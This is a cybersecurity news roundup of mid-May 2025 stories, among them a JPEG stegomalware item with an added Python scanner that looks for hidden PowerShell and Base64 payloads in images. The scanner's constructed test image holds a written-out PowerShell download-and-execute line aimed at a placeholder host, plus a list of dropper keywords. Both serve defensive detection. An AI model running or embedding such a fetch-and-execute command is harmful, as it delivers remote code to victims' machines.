May 19, 2025

News roundup May 19, 2025

San Mateo, CA, May 19, 2025 — Stories, events, and developments that impacted the cybersecurity landscape last week, including emerging threats, policy changes, and industry responses.

White House withdraws plan to regulate data brokers

The CFPB has withdrawn a proposed rule that would have required data brokers to follow the same privacy standards as credit bureaus under the Fair Credit Reporting Act. Introduced in late 2024, the rule aimed to restrict the sale of sensitive personal information, including Social Security numbers, without consent. Acting CFPB Director Russell Vought, who also heads the White House Office of Management and Budget, said the rule no longer aligns with the agency's interpretation of the statute. The reversal follows lobbying by the Financial Technology Association, which warned the policy could disrupt fraud detection efforts. Critics argue that the decision benefits data brokers at the expense of consumer privacy, especially after several 2024 breaches that exposed millions of records.

Linux vulnerabilities exploded in 2024

Action1's 2025 Software Vulnerability Ratings Report reveals a 967 percent spike in Linux vulnerabilities last year, totaling 3,329. A large part of that jump reflects a change in disclosure practice rather than a comparable rise in exploitable bugs: the Linux kernel became its own CVE Numbering Authority in early 2024 and now assigns CVEs to most fixes, so the raw count measures disclosure volume more than severity. macOS also saw a 95 percent jump to 508 flaws, contributing to an overall 61 percent increase in vulnerabilities disclosed across platforms. Flaws known to be exploited rose from 101 in 2023 to 198 in 2024, led by Google Chrome with a 1,840 percent increase and Microsoft Office with a 433 percent jump. Critical vulnerabilities grew by 37 percent, driven by a 71 percent rise in Linux and a 606 percent increase in MSSQL. While remote code execution vulnerabilities declined for Linux and macOS, the report suggests attackers are shifting tactics, not slowing down.

CISA alerts on five active Windows zero-days

CISA has added five zero-day vulnerabilities in Microsoft Windows to its Known Exploited Vulnerabilities catalog, confirming they are under active exploitation. They affect core components including the CLFS driver, WinSock (AFD), the Windows Scripting Engine, and the Desktop Window Manager. All five were patched in Microsoft's May 2025 update. The scripting engine bug is a remote code execution flaw; the other four allow a local attacker to escalate privileges, and chained with an initial foothold they give complete control of a system. There is no direct evidence linking these exploits to ransomware campaigns, but experts say they present serious risks for data breaches and malware deployment. All supported versions of Windows are affected. Federal agencies are required to apply the updates by June 3, and CISA urges all organizations to patch immediately.

Coinbase breach tied to bribed support agents

Coinbase has confirmed that attackers bribed a small number of overseas support agents in India, leading to a data breach that exposed personal details of fewer than 1 percent of its nearly 10 million monthly transacting users. Leaked information included contact data, partial Social Security numbers, government ID images, and limited banking details. The attackers used this information in phishing campaigns to impersonate Coinbase support and persuade customers to move crypto assets to attacker-controlled wallets. On May 11, they attempted to extort Coinbase for $20 million and were refused. Coinbase says no passwords, private keys, or Prime accounts were compromised, and it is reimbursing affected users, tightening insider access controls, and offering a $20 million reward for tips leading to arrests.

Adobe patches Illustrator code execution flaw

Adobe has issued a critical security fix for Illustrator to address CVE-2025-30330, a heap-based buffer overflow vulnerability rated 7.8 on the CVSS scale. The bug affects Illustrator 2025 version 29.3 and earlier, and Illustrator 2024 version 28.7.5 and earlier, on both Windows and macOS. Exploitation requires user interaction, such as opening a malicious .ai file received by email or downloaded from a compromised site; successful exploitation yields arbitrary code execution with the privileges of the current user. Adobe credited researcher "yjdfy" for reporting the flaw and urges all users to update through the Creative Cloud desktop app. No active exploitation has been reported, but file-format bugs of this kind are routinely weaponized once a patch is public.

Scattered Spider targets U.S. retail sector

Google is warning that the cybercrime group Scattered Spider, also known as UNC3944 or Octo Tempest, has shifted its focus from the U.K. to U.S. retail chains. Previously, the group attacked British brands like Marks & Spencer, deploying the DragonForce encryptor to lock down virtual machines on VMware ESXi hosts. John Hultquist, Chief Analyst at Google's Threat Intelligence Group, described the group as "aggressive, creative, and particularly effective at circumventing mature security programs," typically gaining entry through social engineering of help desks and abuse of third-party access rather than through software exploits. Other U.K. retailers such as Co-op and Harrods were also affected, indicating the group's broader targeting of the retail industry.

Florida encryption backdoor bill withdrawn

A controversial Florida bill that would have required social media companies to provide a decryption mechanism for end-to-end encrypted messages when presented with a subpoena has failed to pass. The bill was advanced in the Florida Senate but withdrawn from consideration by the House. Critics, including the Electronic Frontier Foundation, condemned the measure as "dangerous and dumb," noting that a backdoor usable by law enforcement is a key or code path that is equally usable by anyone who steals or coerces access to it, and that building it would put all users' data at risk. Security experts agree that such mechanisms would be ripe for abuse and fundamentally weaken online privacy.

Feds shut down 5socks and Anyproxy botnets

The U.S. Department of Justice has seized infrastructure linked to the Anyproxy and 5socks botnets, which had been operating for over 20 years by infecting outdated wireless routers with malware. The compromised routers were resold as proxy access points via Anyproxy.net and 5socks.net, netting the operators over $46 million. The takedown, Operation Moonlander, involved cooperation with law enforcement in the Netherlands and Thailand. Indictments were issued for three Russian nationals and one Kazakhstani, though extradition is unlikely due to a lack of treaties with their home countries.

JPEG-based ransomware avoids detection

A newly discovered cyberattack chain hides ransomware in JPEG images using stegomalware techniques that evade signature-based security tools. The chain starts with an Office document carrying a macro. When the victim enables it, the macro downloads a JPEG whose EXIF metadata (or pixel data) carries an obfuscated PowerShell script, extracts and runs it, and that script fetches a second JPEG containing a Base64-encoded .NET assembly, which is loaded in memory and delivers the ransomware payload. Because the malicious content sits inside image files and is executed by trusted applications such as Office and PowerShell, file-based detection that only looks for known executable signatures tends to miss it. Practical defenses are the usual ones for this pattern: block macros from internet-sourced documents, alert on Office processes spawning PowerShell, and inspect image metadata and any bytes appended after the JPEG end-of-image marker for script text or Base64 blobs.
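The metadata and trailer check mentioned above, as an added example that is not part of the original article or of any vendor's tooling: a small heuristic scanner that walks a JPEG's header segments (APPn and COM, where EXIF and comments live), searches them for PowerShell indicators and long Base64 runs, decodes the runs to see whether they begin with a PE "MZ" header, and flags any bytes appended after the end-of-image marker. The two images it scans are constructed inline in the code; the "malicious" one carries a harmless placeholder string and a fake two-byte PE header, not real malware, and the domain `example.invalid` is a reserved placeholder.

```python
import base64
import re
import struct

# Added example (not from the original article): heuristic JPEG stego scanner.
# Sample images below are constructed in code and contain no real malware.

SOS, EOI = 0xDA, 0xD9

# Strings typical of a PowerShell stage-one dropper hidden in image metadata.
SCRIPT_INDICATORS = [
    rb"powershell", rb"FromBase64String", rb"\bIEX\b", rb"Invoke-Expression",
    rb"DownloadString", rb"DownloadData", rb"\[Reflection\.Assembly\]::Load",
]
# Camera-written EXIF almost never contains a 64+ character Base64 run.
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def segment_name(marker):
    if 0xE0 <= marker <= 0xEF:
        return f"APP{marker - 0xE0}"
    return {0xFE: "COM", 0xDB: "DQT", 0xC4: "DHT", 0xC0: "SOF0"}.get(marker, f"0x{marker:02X}")


def iter_segments(data):
    """Yield (marker, payload) for each length-prefixed header segment, stopping at SOS or EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        marker = data[pos + 1]
        if marker in (SOS, EOI):
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length field
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])  # length counts its own 2 bytes
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def trailing_data(data):
    """Bytes after the last EOI marker: image viewers ignore them, stego tools use them."""
    idx = data.rfind(b"\xff\xd9")
    return data[idx + 2:] if idx != -1 else b""


def _check_blob(where, blob, findings):
    for pat in SCRIPT_INDICATORS:
        if re.search(pat, blob, re.IGNORECASE):
            findings.append((where, f"script indicator {pat.decode()!r}"))
    for run in BASE64_RUN.findall(blob):
        try:
            decoded = base64.b64decode(run + b"=" * (-len(run) % 4))
        except ValueError:
            continue
        if decoded.startswith(b"MZ"):
            findings.append((where, "Base64-encoded PE/.NET assembly (MZ header)"))
        else:
            findings.append((where, f"{len(run)}-char Base64 run"))


def scan_jpeg(data):
    """Return a list of (location, reason) findings; an empty list means nothing suspicious."""
    findings = []
    for marker, payload in iter_segments(data):
        _check_blob(segment_name(marker), payload, findings)
    tail = trailing_data(data)
    if tail:
        findings.append(("trailer", f"{len(tail)} bytes after EOI"))
        _check_blob("trailer", tail, findings)
    return findings


# --- constructed samples (not real files) -----------------------------------

def _segment(marker, payload):
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

_JFIF = _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
_BODY = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\x34\x56" + b"\xff\xd9"  # SOS + fake scan + EOI

BENIGN_JPEG = b"\xff\xd8" + _JFIF + _segment(0xFE, b"Holiday photo") + _BODY

# Stage one: PowerShell text placed in an APP1/EXIF segment behind a fake TIFF header.
_STAGE1 = (b"Exif\x00\x00MM\x00\x2a\x00\x00\x00\x08"
           b"powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
           b".DownloadString('http://example.invalid/2.jpg')\"")
# Stage two: a Base64-encoded fake PE ("MZ" + padding) appended after EOI.
_STAGE2 = base64.b64encode(b"MZ" + b"\x90" * 46)
STEGO_JPEG = b"\xff\xd8" + _JFIF + _segment(0xE1, _STAGE1) + _BODY + _STAGE2


if __name__ == "__main__":
    for name, img in (("benign", BENIGN_JPEG), ("stego", STEGO_JPEG)):
        print(name, scan_jpeg(img) or "clean")
```

The scanner deliberately stops at the SOS marker and does not decode pixel data, so a payload hidden in least-significant bits of the image itself would not be caught; that case needs a decoder and a statistical test rather than string matching. Treat the keyword list as a starting point, since real droppers obfuscate these tokens, and pair the check with the process-level alert (Office spawning PowerShell) that does not depend on the image at all.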

Bluetooth 6.1 enhances privacy with randomization

Bluetooth 6.1 introduces randomized Resolvable Private Address (RPA) updates to combat passive tracking. Previously, RPAs rotated at a fixed, predictable interval, typically every 15 minutes, so an observer who saw one address disappear and a new one appear on schedule could link them and follow the device over time. The new specification randomizes the rotation interval, between 8 and 15 minutes by default, with a configurable range from 1 second to 1 hour. Because the timing is drawn from a NIST-approved random number generator in the controller, address changes no longer line up with a clock, which makes it much harder to track Bluetooth-enabled devices in environments like retail stores and airports.


About NetworkTigers

NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com.

Ben Walker
Ben Walker is a freelance research-based technical writer. He has worked as a content QA analyst for AT&T and Pernod Ricard.
